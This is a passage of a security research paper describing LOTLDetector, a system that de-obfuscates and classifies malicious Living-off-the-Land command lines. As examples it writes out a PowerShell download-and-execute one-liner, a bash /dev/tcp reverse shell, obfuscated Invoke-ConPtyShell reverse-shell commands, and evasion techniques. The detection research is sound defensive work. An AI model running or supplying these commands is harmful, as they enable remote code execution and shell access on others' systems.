Content area
In recent years, Living off the Land (LotL) attacks have been drawing attention due to their flexibility and difficulty in detection. These attacks exploit legitimate tools already in the system to conduct malicious activities, hiding their malicious intent behind normal benign programs. However, detection methods for such attacks largely rely on expert rules. While rule tags can effectively detect known attacks, this also leads to a high false positive rate, resulting in low detection accuracy for the models. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning methods with expert rules to detect malicious command lines in LotL attacks from both data and knowledge perspectives. LOTLDetector learns the semantics of command line text through neural networks and combines rule tags from expert knowledge, enabling a more comprehensive detection of LotL attacks. We extensively evaluated our method, validated it on a Windows dataset containing 27,448 command lines and a Linux dataset containing 27,093 command lines, and compared it with existing methods. The results show that our method significantly outperforms existing methods in detecting malicious command lines. For the Linux dataset, the detection system achieved a detection performance with an accuracy of 0.9728; for the Windows dataset, the system’s detection accuracy also reached 0.9598, which is about 8% higher than the best existing method. In addition, our project has been open-sourced at
Introduction
With the advancement of technology, the methods of cybercrime are constantly evolving, posing a serious threat and challenge to our digital lives. According to the CrowdStrike 2024 Global Threat Report https://www.crowdstrike.com/global-threat-report/, attackers are increasingly using legitimate tools to execute attacks. The proliferation of this technology makes it difficult for existing security tools to distinguish between normal activities and malicious activities. Moreover, since these tools are often used by system administrators for legitimate work and are added to the system’s whitelist, defenders find it hard to completely block access to these programs. Attackers can therefore hide under these benign programs, not only achieving the purpose of malicious attacks but also evading existing malware detection (Chen et al. 2024; Alsulami et al. 2017; Downing et al. 2021). As malware detection algorithms and methods continue to improve, malware authors are also adopting equally sophisticated evasion mechanisms to counter them. LotL technology is one of the main evasion techniques used in many malware attacks. According to research by Barr-Smith et al. (2021) on malware in Windows systems, it was found that LotL technology is widely used in Advanced Persistent Threat (APT) malware samples, with a prevalence rate of 26.26%. In summary, attackers use a variety of methods to bypass the checks of security tools. For example, such a malicious command "powershell -NoP -NonI -W Hidden -Exec Bypass ’IEX(New-Object System.Net.WebClient).DownloadFile(’[REMOVED]’, ’$env: tempii.jse’); Invoke-Item "$env:tempii.jse"’" allows attackers to download a remote malicious script file through PowerShell and execute the downloaded script file using the Invoke-Item command. Even if a log file is generated for this command, because it does not load the configuration file and does not enable interactive mode, it leaves very few traces. The log may only record a file download and execution of PowerShell, and in the vast amount of logs, there are many such operations, making it difficult for security analysts to detect anomalies. We refer to the attack method that leverages pre-installed and post-installed binary files within a system to carry out malicious activities as Living off the Land (LotL) (Liu et al. 2023). The binaries used in LotL attacks are called LOLBins (https://informationsecurityasia.com/zh-cn/what-is-lolbas/#real-world_instances_of_lolbas_attacks_and_their_consequences). Attackers primarily use these LOLBins for purposes such as proxy execution, reconnaissance, task termination, and registry modification, without leaving any binaries on the disk.
LotL attacks exhibit several key characteristics: minimal attack footprint, persistence, and the use of dual-use tools (Ning et al. 2023). For example, certutil.exe is a Windows command-line program that can be used for certificate management tasks, but it can also download files from the Internet, encode or decode certificate files. However, attackers can also use this tool to download malicious files or hide existing files. Such methods may be used by complex malware or attackers after the initial intrusion. The side-use cases of these tools allow attackers to evade detection because these programs are usually included in the whitelist, and their usage does not lead to the generation of alerts. In a report by threatpost (https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/), Uptycs’ threat research team found that the proportion of using these LOLBins in various stages of the MITRE ATT&CK framework (https://attack.mitre.org/) has significantly increased, precisely because these LOLBins can be used to bypass certain security restrictions, making them naturally attractive to cyber attackers. The use of these LOLBins by attackers only requires entering the corresponding instructions in the command-line interpretation window (Command-Line Interface, CLI) to achieve the desired effect. Therefore, our detection of LotL attacks naturally transforms into the detection of malicious command lines.
Currently, the detection of malicious command lines can be roughly divided into two types. The first type is the traditional pattern matching based on expert knowledge rule extraction (Boros et al. 2022) , but this method has a problem: the precision of the model detection is dependent on the definition of the rules. If the rules are defined too strictly, the number of missed reports for malicious command lines by the model will increase rapidly, and if the rules are defined too broadly, the number of false reports for command lines by the model will rise rapidly. At the same time, rule-based detection can be easily bypassed. The second type is based on deep learning of natural language processing (Ongun et al. 2021; Yamin and Katt 2019; Hendler et al. 2018, 2020; Fang et al. 2021; Rusak et al. 2018; Ding et al. 2023; Yang et al. 2023) , which makes it easy to extract features from command line texts, but this leads to a rich feature set, making the model prone to overfitting quickly and having poor generalization capabilities.
In the process of this research work, we also found that some malicious command lines will change the text structure of the malicious command line through some obfuscation methods to bypass the detection of security tools. Although there is currently some work being done on de-obfuscation, their research objects are basically focused on PowerShell scripts (Li et al. 2019; Malandrone et al. 2021; Ugarte et al. 2019; Liu et al. 2018; Tsai et al. 2022), and there is very little research on de-obfuscation of command lines themselves. These de-obfuscation methods for PowerShell (https://docs.microsoft.com/en-us/powershell/scripting/overview) scripts can be roughly divided into two categories: based on abstract syntax trees (AST) and regular expressions. Since the structure of command line texts is much simpler compared to scripts, we designed a multi-layer de-obfuscation algorithm based on regular expressions for different obfuscation methods. After the original command lines collected are processed by this multi-layer de-obfuscation algorithm, a clean and clear command line text is obtained.
In the subsequent research process, we were the first to research the combination of traditional rule matching and deep learning based on natural language processing to detect individual LotL attack commands. To address the shortcomings of rule matching methods in the problem of false negatives, we used natural language processing technology to encode command line texts into word vectors, and combined deep learning to learn the relevant features between vectors, to improve the accuracy of detection. However, feature learning based on word vectors in deep learning may have the problem of underfitting, and the model is prone to misidentifying benign command lines as malicious. To solve this problem, we introduced rule extraction based on expert knowledge, using pattern matching to alleviate the problem of false positives in the deep learning model. With this dual approach, we can more effectively detect LotL attack commands while reducing false negatives and false positives. In addition, we also considered that some special command lines may be benign in the current context, but they may be malicious in another context, and we define such commands as suspicious commands. For example, the command "net view" can be used to view the list of network computers and shared resources; in short, it can use this command to view other active computers in the domain. However, during the lateral movement phase of the attacker, this command is usually used to determine the object of lateral movement. When combined with the context analysis of the command line, we can determine this command as malicious. Since ordinary users can also use this command, in the absence of the context environment, we can only determine it as suspicious. When the model detects suspicious commands, it will provide this command to security analysts for analysis in conjunction with the context of the log environment. We collected 27,520 Windows command line data and 27,003 Linux command line data in the enterprise operating environment.
The main contributions of our work can be summarized as follows:
To address the current gap in methods for deobfuscating command line text, we propose a multilayer de-obfuscation algorithm based on regular expressions to deal with different obfuscation methods of command lines.
We propose a new detection method that combines traditional rule matching with deep learning based on natural language processing to form a multi-feature source, to solve the problem of insufficient detection accuracy caused by the use of a single feature source.
We have implemented a three-classification model for command lines instead of the traditional two-classification model because sometimes the boundary between malicious and benign command lines is unclear. Some command lines may be benign in scenario A and malicious in scenario B, which are considered suspicious command lines. By bringing forward suspicious command lines, analysts can better utilize context for judgment.
Related work
In this section, we analyze existing detection methods for LotL attacks, as shown in Table 1. As shown in Table 10, we have summarized the existing research work on the detection of malicious command lines and malicious scripts. The table lists the models, research subjects, research focuses, whether deobfuscation techniques are involved, and whether rule-based detection methods are used for each study. These studies cover a range from simple character-level convolutional neural networks to complex Transformer and CNN-BiLSTM combined models. By comparing the models and methods of different studies, we can better understand the current research progress and existing challenges in the field. At the same time, we have also noticed that most of the research on detecting such attacks focuses on identifying malicious PowerShell script files rather than detecting malicious command lines. Although the structure of malicious command lines is much simpler compared to malicious scripts, because their composition elements are all text, the research methods for these texts are interconnected. Therefore, we discuss the study of malicious scripts together with the study of malicious command lines.
In the remainder of this section, we will review the detection methods for malicious command lines/malicious scripts from two perspectives: rule-based detection methods based on pattern matching and deep learning methods based on natural language processing techniques.
Table 1. Summary table of main related work
Related work | Model | Research object | Focus | de-obfuscation | Rule |
|---|---|---|---|---|---|
Hendler et al. | Character-level CNN 4-layer CNN | PowerShell Command Line | Binary classification | ||
Kels et al. | Token-Char-level CNN | PowerShell script | Binary classification | ||
Fang et al. | Random forest | PowerShell script | Binary classification | ||
Ongun et al. | Random forest | Windows Command Line | Binary classification | ||
Li et al. | AST | PowerShell script | De-obfuscation | ||
Ding et al. | CNN | Linux Command Line | Binary classification | ||
Boros et al. | Random forest | Windows Command Line Linux Command Line | Binary classification | ||
Yang et al. | Transformer-CNN-BiLSTM | PowerShell script | Multi classification |
Pattern-based rule detection method
Rule-based detection methods, which leverage expert knowledge to predefine certain rules for the extraction of malicious command lines, are effective for detecting commands that match existing rules in the rule set. Boros et al. (2022) established a series of rule lists, essentially creating a rule library. When a new command-line text is encountered, the system checks the rule library for a matching rule. If a match is found, the corresponding label for that rule is returned; otherwise, a null value is returned. This rule-based detection is effective for command lines that have corresponding rules in the rule library.
However, the main limitation of this method is that attackers can easily use obfuscation techniques to alter the original structure of malicious command lines, rendering the rule-based detector ineffective. By obfuscating the command line, attackers can bypass the detection mechanisms that rely on pattern matching against known rules.
Deep learning methods based on natural language processing techniques
Deep learning methods based on Natural Language Processing (NLP) techniques utilize NLP technologies such as Word2Vec and FastText to semantically analyze command line texts in conjunction with their contextual information and extract key features. These features are then combined with deep learning models to train classifiers for identifying malicious command lines. Hendler et al. (2018) implemented a character-level convolutional neural network detector for the detection of malicious PowerShell command lines. Hendler et al. (2020) used Word2Vec and FastText for context embedding and fed these embeddings into a deep neural network for the detection of malicious PowerShell code. Fang et al. (2021) leveraged FastText for PowerShell script embedding, combined with extracted text features, token features, and AST node features, employing a random forest classifier for classification. Ongun et al. (2021) utilized Word2Vec word embedding technology to represent command line texts and employed an active learning framework to iteratively select a set of uncertain and anomalous samples for human analysts to label. Ding et al. (2023) represented Linux command line texts through Word2Vec word embedding technology and then used a TextCNN model to detect malicious Linux command lines. Yang et al. (2023) extracted four different features of PowerShell scripts and constructed a combination model based on transformer and CNN-BiLSTM for PowerShell family detection.
Background knowledge
Living off the land (LotL)
Advanced Persistent Threat (APT) is a complex, ongoing cyberattack where attackers are well-organized and operate over a long period. They use stealth and evasion techniques, such as zero-day attacks, causing significant global security threats and economic losses. Additionally, according to a report by Symantec (Wueest et al. 2017), APT attacks primarily employing the Living off the Land (LotL) attack method are showing a continuous upward trend. This is because attackers can exploit pre-installed and post-installed binary files within the system to carry out malicious activities, while these tools are also used by system administrators for legitimate work, it makes it difficult for defenders to completely block access to these programs, allowing attackers to hide in plain sight. This makes it difficult to detect anomalies even if log files are generated. Alternatively, simple scripts and shellcodes can be run directly in memory. This means that fewer new files are created on the hard drive, thereby reducing the risk of detection by traditional security tools.
LotL attackers rely on existing tools to carry out malicious operations while blending into the system’s daily tasks without triggering additional alerts. The misuse of clean system tools can bypass many protective mitigations, such as application whitelisting. According to Victor Fang’s blog (Fang 2018), we can find that attackers on the Windows platform prefer to exploit PowerShell because it can be used for the installation of backdoors, execution of malicious code, and other attack methods. Moreover, any scripts used in the attack can be obfuscated through simple techniques, making traditional signature-based static detection methods almost unable to detect them. For attackers, the advantage of scripts is that they can be quickly updated and modified without a significant development cycle, making them more flexible and customizable according to their environmental purposes. These factors combined lead to significant problems in the reliability of many traditional security solutions in preventing LotL attacks.
Text embedding
In recent years, several methods for embedding words into vectors have been proposed(Mikolov 2013; LeeJDMCK and Toutanova 2018; Joulin et al. 2016). These methods leverage large datasets of text documents (such as Wikipedia articles) to obtain vector representations of words in Euclidean space from the context in which they appear in the corpus. These embedding methods are more popular than traditional one-hot encoding in various NLP tasks because they can project semantically similar words to nearby vectors in the embedding space.
The representation of text data in machine learning tasks has been widely studied. Since machine learning models require numerical input representations, the tokens in the text need to be mapped into a numerical space. Therefore, in our detector, a context embedding method called Word2Vec is adopted, which is a technique for representing individual words as n-dimensional numerical vectors, with the contextual information of each word embedded in the resulting vector. At the same time, semantically similar words are also closer in the embedding vector space. During the training phase, Word2Vec can choose between two training algorithms ("CBOW" or "Skip-gram"), either trying to predict the token based on its context like CBOW or predicting the context of a given token like skip-gram. In this work, we use the vectors generated by this embedding technique to represent command line text data for training machine learning models. However, there is a drawback to Word2Vec: it cannot vectorize words that were not seen during the training phase. Therefore, for this situation, our strategy is to randomly vectorize the representation of words that have not been seen.
Deep learning
In this section, we provide background knowledge on the concepts and architectures of deep learning, which is essential for understanding the deep learning-based malicious command line detector introduced in Section “Background Knowledge”.
Convolutional neural network (CNN)
CNN is a learning architecture commonly applied in the field of computer vision. However, in our scenario, the research object is text, which belongs to the domain of Natural Language Processing (NLP). Therefore, we typically add an embedding layer in front of the convolutional layer to transform a command-line text into a matrix of word vectors. The main components of CNN include the convolutional layer, pooling layer, and fully connected layer (Rakhlin 2016).
The workflow of the convolutional layer can be described as follows: assuming the input word vector matrix has the shape of m*n (m represents the dimension of the word vector, and n represents the length of the command line text). The convolutional layer uses multiple different integers k to construct multiple convolutional kernels of different shapes k*m (m is the dimension of the word vector). As the convolutional kernel slides over the word vector matrix, the k*m weight parameters in the kernel perform a dot product with the corresponding k*m parameters at the same position in the word vector matrix, and the results are summed up. When this convolutional kernel traverses the entire word vector matrix with a stride of s, we obtain a feature vector.
The pooling layer primarily serves to reduce the dimensionality of the data, lower computational complexity, and extract features while retaining important information. Typically, there are maximum pooling and average pooling. The maximum pooling operation selects the maximum value within the pooling window as the output, which means that only the most salient features are retained, and other secondary features are ignored. The average pooling operation calculates the average value of all values within the pooling window as the output, which means that the average feature value within the pooling window is preserved. In our work, we choose the maximum pooling operation for feature extraction because it can extract the most prominent features while reducing the risk of overfitting. Finally, the fully connected layer connects the features processed by the pooling operation together.
Transformer
The Transformer(Vaswani 2017) model is primarily composed of two parts: the Encoder and the Decoder. Since our task is a classification task, not a generative task, we do not need to utilize the Decoder part. Therefore, we will focus on introducing the Encoder part of the Transformer. In the Transformer model, the Encoder consists of multiple identical layers stacked on top of each other, each containing two sub-layers: the self-attention mechanism and the feed-forward neural network. The self-attention mechanism calculates the attention that each position in the input sequence pays to other positions, thereby capturing the dependencies within the sequence. The feed-forward neural network then performs a non-linear transformation on the output of the self-attention mechanism to extract higher-level features. During the operation of the Encoder, the input sequence first undergoes processing by the self-attention mechanism to obtain attention weights for each position relative to other positions. These weights are then used to weight the input sequence to obtain a weighted representation. Subsequently, this weighted representation is fed into the feed-forward neural network for further processing to obtain the final output of the Encoder. In our task, the main components of the Transformer that we use are position encoding, multi-head self-attention mechanism, residual connections and normalization, and the feed-forward neural network.
Positional Encoding: Positional encoding is added after the word vectors in the input sequence to retain the positional information within the sequence. Positional encoding is typically obtained by incorporating the values of sine and cosine functions into the word vectors.
Multi-Head Self-Attention Mechanism: In each encoder layer, the input sequence goes through a multi-head self-attention mechanism, which includes linear transformations of queries, keys, and values. Then, self-attention scores are calculated, and the values are weighted and summed according to these scores, allowing the model to capture positional dependencies between different positions in the sequence.
Residual Connections and Normalization: Residual connections and normalization are applied after each sub-layer, allowing the input signal to bypass the sub-layer and be passed on to subsequent layers. This helps alleviate the problems of vanishing and exploding gradients, accelerating the training speed of the model.
Feed Forward Neural Network: This involves performing two layers of linear mapping on the network tensors and then activating them through an activation function.
Command line code obfuscation
The term “obfuscation” refers to techniques where attackers modify command line code structure through obfuscation frameworks (https://github.com/d anielbohannon/revoke-obfuscation, https://github.com/danielbohannon/invoke-dosfuscation) without changing semantics, aiming to prevent security analysts from analyzing execution purposes. These obfuscation strategies are particularly effective against signature-based detectors. In real-world cyber attacks, attackers often use these obfuscation techniques to obscure command lines to bypass system restrictions and the detection of security tools. This requires us to deobfuscate the command line samples before feature extraction; if we extract features without any processing of the original data, the effectiveness of the extracted features will be greatly reduced. According to a report by FireEye (https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level _cmd_obfuscation-wp.pdf) and existing work on deobfuscating PowerShell commands (Liu et al. 2018; Ugarte et al. 2019; Malandrone et al. 2021; Li et al. 2019), we summarize the common obfuscation methods for command lines into the following four major categories:
Encoding Obfuscation: Attackers encode parts or all of the command line using methods like Base64, Unicode, Hex, or Octal encoding, or alternate capitalization to disguise the text and bypass certain security devices. To counter this, regular expressions can be used to identify different encoding schemes and appropriate decoding algorithms can be applied to deobfuscate the encoded sections.
Command Line Insertion Obfuscation: By inserting special characters such as " ; () and spaces into the command line, attackers can disrupt the parsing and understanding of the command line structure by security tools. Although the text appears different from the original, it has the same effect when executed. For this type of obfuscation, regular expressions can be used to match predefined special characters and replace them with a single space.
Command Line Logical Obfuscation: Attackers may break down the command line text into a list of strings and then reassemble a new command line using format specifiers during execution.
Hybrid Command Line Operation Obfuscation: This method combines various string operations, such as string insertion, Base64 encoding, and string replacement. For this type of multifaceted obfuscation, the strategy is to apply the de-obfuscation strategies for individual obfuscation methods sequentially.
Table 2. Description of obfuscation methods and corresponding examples
ID | Description | Example |
|---|---|---|
1 | Encode parts of the command line text using Base64. | IEX(IWR aHR0cHM6Ly9leGFtcGxlLmNvbQ==); Invoke-ConPtyShell 192.168.52.129 9000 |
2 | Insert special characters. | I⌃⌃⌃⌃E⌃X(I⌃WR https://example.com; I⌃nvoke-ConPtyShell 192.168.52.129 9000 |
3 | Split and reassemble the command line text using the dollar sign ($) symbol. | $a = IEX(IWR https://; $b = example.com); $c=Invoke-ConPtyShell 192.168.52.129 9000; $a+$b+$c |
4 | Use a variety of the aforementioned obfuscation methods. | I⌃⌃⌃E⌃X(I⌃WR aHR0cHM6Ly9leG FtcGxlLmNvbQ==); I⌃nvoke-ConPtyShELL 192.168.52.129 9000 |
System Design
To address the current issues in malicious command-line detection, we first design and implement a deep learning detector based on multi-feature fusion called the LOTLDetector to detect malicious command lines. The overall architecture of the LOTLDetector is shown in Fig. 1. The LOTLDetector mainly consists of four stages: data preprocessing, feature extraction, feature encoding, and feature learning.
[See PDF for image]
Fig. 1
Architecture of the LOTLDetector
Data Preprocessing: During actual attacks, attackers often use obfuscation techniques to encode originally clear and understandable command line texts into structures that are unclear and not conducive to understanding, in order to evade the detection of security tools. After obtaining the original command line input data, the LOTLDetector first goes through a multilayer de-obfuscation algorithm we designed to obtain command line texts that are structurally clear and easy for security analysts to understand. Then, in the standardization phase, regular expressions are used to match some common texts in the command line and replace them with the same token, thereby reducing the complexity of the command line structure. Finally, the preprocessed data is divided into training, validation, and test datasets.
Feature Extraction: In this stage, three types of features are extracted. The first type involves matching predefined rules to obtain a series of rule tags. The second type uses natural language processing techniques to tokenize the command line, resulting in a series of word level tokens. Lastly, a database of known malicious command lines is constructed to compare the new command line with the command lines in the database for text similarity, resulting in similarity tags.
Feature Encoding: The features extracted in the feature extraction phase are transformed into vectors for subsequent learning by the neural network model. The LOTLDetector uses Word2Vec to map the three different command line features into vectors, resulting in three embedding representation methods: Token2Vec, Rule2Vec, and Similarity2Vec. Because the semantic features of command-line provided from multiple dimensions are richer than those from a single dimension, we opt to combine features from three different dimensions: Token2Vec, Rule2Vec, and Similarity2Vec. By fusing these features, we create a new fusion vector. This vector offers a more comprehensive embedding representation for subsequent command-line detection.
Feature Learning: We construct a combined model of Transformer and TextCNN to learn the features of the fusion vector obtained in the feature extraction phase, thereby achieving the detection of malicious command lines. The Transformer model can better focus on the global information of the sample, while the TextCNN model pays more attention to the local information of the sample. Therefore, the combination of the two can achieve effects that no single model can reach. At the same time, the main function of the LOTLDetector is to identify malicious command lines. We combine the common uses of system binary files with the ATT&CK framework to divide the command line tags into three categories. A detailed introduction will be given in later sections.
Data preprocessing
De-obfuscation
Due to the obfuscation techniques introduced earlier, the syntactic structural features of the original command line code are greatly weakened, making it difficult for classification models to recognize the original features, resulting in low accuracy. Therefore, in order to obtain a high-quality command line dataset, we have implemented corresponding de-obfuscation algorithms for each type of obfuscation method to obtain high quality training sample data. We will provide a detailed introduction to the de-obfuscation strategies for each obfuscation method.
Encoding Obfuscation: Attackers encode command line code, which is easy for security analysts to understand, into a form that is difficult to comprehend by using other encoding schemes. Since each encoding method has a certain form, as shown in Algorithm 1, we first identify the possible encoding method, and then call the corresponding decoding function of this possible encoding method to complete the de-obfuscation of command line code obfuscation.
[See PDF for image]
Algorithm 1
De-obfuscation of encoding obfuscation
Command Line Insertion Obfuscation: Attackers insert special characters into the middle of the command line code to segment the command line. However, because the Windows command interpreter can automatically remove these special characters when executing command line code, signature-based security detection tools fail to function effectively at this point. As shown in Algorithm 2, we use regular expressions to match the special characters in the command line code that are used to segment the command line. When the special characters are successfully matched, they are replaced with spaces.
[See PDF for image]
Algorithm 2
De-obfuscation of insertion obfuscation
Command Line Logical Obfuscation: For this type of obfuscation, as shown in Algorithm 3, we first identify variables that begin with the ’$’ symbol in the command line. Then, following the order in which the variable names are concatenated in the command line, we reconstruct a new command line code that is easier for security analysts to understand.
[See PDF for image]
Algorithm 3
De-obfuscation of command line logic obfuscation
Hybrid Command Line Operation Obfuscation: In some malicious samples, we have also discovered a very complex obfuscation method. This method combines various string operations to bypass security checks to achieve malicious purposes. For example, command line insertion obfuscation, command line logical obfuscation, and encoding obfuscation. Therefore, for this type of obfuscation, we adopt the following steps to de-obfuscation the command line code.As shown in Algorithm 4.
Step 2: Next, de-obfuscation the command line insertion. In this step, all special symbols need to be replaced with spaces to avoid the presence of special symbols causing subsequent decoding obfuscation to fail. We implement this step by calling Algorithm 2.
Step 3: In this step, de-obfuscation the encoding obfuscation, encoding other encoding methods into a readable form for security analysts. We implement this step by calling Algorithm 1.
Step 4: Finally, obtain clean command line code.
[See PDF for image]
Algorithm 4
De-obfuscation of Mixing Command Line Operations Obfuscation
Normalization
In this step, regular expressions are used to quickly match and identify command line arguments that can be standardized within the command line text. We use the five different regular expressions shown in Table 3 to match five different command line argument objects. Since different command lines can use different binaries, access different paths, and make requests to different IP addresses, we need to consider that for parameters like IP addresses, their form is the same, but the values are different. We might consider replacing different IP addresses with the same identifier, such as using a "private_ip" tag to replace private IP addresses like 192.168.1.1 and using a "public_ip" tag to replace public IP addresses. For access to binary files in command lines, the path is often included, but this path information is often redundant. We can use regular expressions to match and replace it with a filepath tag. Finally, for numbers and URL addresses in the command line arguments, we also use regular expressions to match and replace them with number and URL tags, respectively.
At the same time, command lines will also contain uppercase and lowercase letters. In this stage, we need to convert all uppercase letters to lowercase because "TEMP" and "temp" express the same meaning to us, but the word vector model will not know that these two words express the same meaning during training. As a result, the model will generate two different word vectors, which will reduce the effectiveness of the word vector features during model training.
The reason for replacing these command line arguments with tags is that the information contained in these argument objects is not very prominent, and the similarity of these argument information is very high among different command lines. Replacing these highly similar objects with a unified tag can reduce the difficulty of the Word2Vec word vector model training, while also making the word vector features trained by the model more prominent.
Table 3. Regular expressions for matching different command line objects
Label | Regex | Examples |
|---|---|---|
private_ip | b(?:10|172. (?:1[6-9]|2[0-9]|3[0-1]) |192.168).d{1,3}. d{1,3}b | 192.168.3.1 |
public_ip | b(?:25[0-5]|2[0-4][0-9]| [01]?[0-9][0-9]?). (?:25[0-5]|2[0-4][0-9]| [01]?[0-9][0-9]?). (?:25[0-5]|2[0-4][0-9]| [01]?[0-9][0-9]?). (?:25[0-5]|2[0-4][0-9]| [01]?[0-9][0-9]?)b | 5.5.5.5 |
number | bd+b | 12345 |
filepath | ⌃([a-zA-Z]:([⌃/:*? |]+)* [⌃/:*?<ss>|]+.[⌃ /:*?<ss>|]+ ,)* [a-zA-Z]:([⌃/:*?<ss >|]+)* [⌃/: *?<ss>|]+. [⌃/:*?<ss>|]+$’) | C:Program Files ExampleFile.txt |
url | ⌃(https?|ftp)://(www.)? ([a-zA-Z0–9-]+.)* [a-zA-Z0–9]+(.[a-z]{2,6}) (:[0–9]+)?(/[⌃s]*)?$ | https://example.com/index.html |
Feature extraction
Rule extraction
Security experts, when analyzing whether a command line is malicious, usually start from certain security knowledge, such as checking what binary files the command line uses, what paths it accesses, what IP addresses or domain names it accesses, and what its parameters are. For example, the command "bash -i>& /dev/tcp/192.168.1.1/9999 0> &1", which is used to perform a reverse shell on a Linux system, is easily recognized as malicious by a security expert. However, for a deep learning model requires complex training. To provide more effective features for subsequent model training, we have established a rule library for malicious command lines based on expert knowledge. The rule library contains three lists that save different rules of the command line, namely the command line path, the command used in the command line, and the parameters of the command line. Therefore, for the example command-line mentioned earlier, the command line path list in the rule library saves "/dev/tcp", the command list saves "bash", and the parameter list saves "-i> &" and "0> &1".
Thus, to more effectively identify and analyze potential malicious command lines, we have designed some special tags based on the aforementioned rules. As shown in Table 4, we have designed three types of rule extraction tags, which include the command line path, the command used in the command line, and the parameters of the command line. Therefore, for the example command-line mentioned above, the returned tags would be "path_/dev/tcp", "command_bash", "parameter_-i> &", and "parameter_0> &1".
Table 4. Description of rule label extraction types and corresponding examples
Rule label | Description | Examples |
|---|---|---|
path_keyword | When a path matches one of the predefined paths in the ruleset, it prefixes the path with ’path’ as the return label. | path_/dev/mem |
command_keyword | When a command matches one of the predefined commands in the ruleset, it prefixes the command with ’command’ as the return label. | command_kill |
parameter_keyword | When a parameter matches one of the predefined parameters in the ruleset, it prefixes the parameter with ’parameter’ as the return label. | parameter_–list-keys |
Token extraction
Each command line consists of two parts: the executable program path and the command line arguments. For example, the command line "C:WindowsSystem32cmd.exe /c copy /y C:Program filesappdatalocaltemp19084.bmp C:Program filesappdatalocaltemp19084.bmp.vbs" has its executable program path as "C:WindowsSystem32 cmd.exe" and its arguments are "/c copy /y C:Program filesappdatalocaltemp19084.bmp C:Program files appdatalocaltemp19084.bmp.vbs". In our view, this entire command line text is composed of different tokens, some of which may exhibit a strong malicious intent, while others may be lost due to incorrect parsing rules. Therefore, tokenizing the command line text to obtain a representative token sequence of the command line structure is an important task.
We use a common and efficient method for token division based on command separators ( ., /;), which ensures that the tokens we capture are complete natural words. For example, the command "C:WindowsSystem32cmd.exe /c copy /y C:Program files appdata localtemp19084.bmp C:Program filesappdatalocaltemp19084.bmp.vbs", after undergoing our previous de-obfuscation and standardization operations, will be transformed into "c:windows system32cmd.exe /c copy /y c:program filesappdatalocal tempnumber.bmp c:program files appdatalocaltemp number.bmp.vbs" and then it will be tokenized into the list [’c’, ’windows’, ’system32’, ’cmd’, ’exe’, ’c’, ’copy’, ’y’, ’c’, ’program’, ’files’, ’appdata’, ’local’, ’temp’, ’number’, ’bmp’, ’c’, ’program’, ’files’, ’appdata’, ’local’, ’temp’, ’number’, ’bmp’, ’vbs’].
Similarity comparison
At the current stage, we adopt a centralized data processing method that collects all command lines identified as malicious in the training set into a dedicated malicious command line data table. This data table serves as a reference standard for subsequent command-line identification and analysis processes. Whenever our model needs to evaluate a new command line, it compares similarity by calculating the BLEU score, which is a metric for measuring the similarity of text sequences. It assesses similarity by calculating the matching of 1-gram, 2-gram, 3-gram, and 4-gram between the input text and the reference text. The final BLEU score ranges from [0, 1], where 1 indicates a perfect match (all n-grams are identical), and 0 indicates no match at all. Therefore, our strategy is to assign a similarity label when the similarity between the tested command line and the reference command line exceeds a certain threshold, indicating a high similarity to known malicious command lines. We typically set this similarity threshold at 80%, through the sensitive test.
By employing this method, we can effectively leverage historical data to enhance the model’s ability to identify newly emerging malicious command lines. It also provides security analysts with a tool for rapid response and handling of potential threats. This strategy not only improves the accuracy of identification but also enhances the adaptability and response speed to new types of malicious behavior.
Feature encoding
In the feature extraction phase, we carefully selected and extracted a series of rule labels with the help of domain expert knowledge. These rule labels encapsulate the experts’ profound understanding and experience summary of the specific domain. To further integrate expert knowledge with deep learning technology, we adopted the Word2Vec model encoding strategy. Specifically, we input the rule labels, word tokens, and similarity labels into the Word2Vec model separately, encoding each into a 100-dimensional vector. This process not only preserves the semantic information contained in the expert knowledge but also endows it with a numerical form suitable for machine processing through the deep learning model, achieving seamless integration of expert knowledge and deep learning.
During the encoding process, we divided the command-line features into three key parts: rule label encoding, word token encoding, and similarity label encoding. Each part’s vector representation was assigned a weight parameter. As shown in Fig. 2, taking the command “ping www.baidu.com” as an example, through token extraction, the words in the command are split to get [ping www baidu com]. Through rule extraction, “ping” is matched to obtain the "command_ping" rule label. Through similarity comparison with the known malicious command "ping www.baodu.com”, high similarity is achieved and the “Similarity label” is obtained. Then these three types of features are respectively encoded through word embedding to get three different feature vectors. Finally, we weighted and concatenate the feature vectors of rule labels, word tokens, and similarity labels on each identical dimension to form a new feature vector. This new feature vector integrates the three different types of feature vectors through weighted fusion and serves as the input to the model. It can contain more feature information than any single vector. Moreover, these weight parameters are not fixed but dynamically adjusted during the model training iteration process. In this way, the model can automatically optimize the weight parameters based on the feedback during the training process, gradually finding the most suitable parameter values for the current task in different training rounds. This dynamic adjustment mechanism not only improves the model’s utilization efficiency of expert knowledge but also enhances its ability to learn complex feature relationships, providing more accurate and effective feature representations for subsequent deep learning tasks.
[See PDF for image]
Fig. 2
Command line feature extraction and encoding examples
Feature learning
We constructed an effective combination model based on TextCNN and Transformer. The main reason is that TextCNN is good at extracting local features, while Transformer is good at capturing global dependencies. By combining the two, both local and global information can be utilized simultaneously, thereby improving the accuracy of classification.
The overall architecture of the classification model is shown in Fig. 3 and mainly includes five parts: Multi-feature Embedding; CNN Module; Transformer Module; Fully Connected; Classification.
Multi-feature Embedding. We process the command line text corpus through the previous method and map it to multi-feature vectors. Multi-feature embedding consists of Token2vec, Rule2vec and Similarity2vec, which integrates three layers of features and serves as the input for the subsequent neural network model.
CNN Module. TextCNN is a CNN specifically designed for text classification problems. TextCNN captures features between multiple consecutive words in continuous text sequences by using convolutional kernels of different sizes, so the CNN module is used to extract local key features in the command line sequence.
Transformer Module. We design and implement a multi-head self-attention mechanism in the LOTLDetector, which improves the model’s representation and learning ability by calculating multiple attention heads in parallel. In the multi-head self-attention mechanism, the input sequence is first linearly transformed, then divided into multiple subspaces, each of which is used to calculate an independent attention head. Each attention head has its own query (Q), key (K), and value (V) vectors. By performing a dot product operation between the query and the key, attention weights are obtained. The weights are multiplied by the value vector and summed to get the attention output for each position.
Fully Connected. In this module, we concatenate the outputs of the CNN module and the Transformer module through a fully connected layer to form a new vector.
Classification. The new vector obtained from the fully connected stage is transformed into a probability distribution through the softmax function, thereby identifying the category to which the command line belongs (benign, suspicious, and malicious). In summary, we successfully constructed a combination model of CNN and Transformer, which identifies the category of the input command line through the above five steps.
[See PDF for image]
Fig. 3
Model architecture diagram
Experimental setup
Dataset
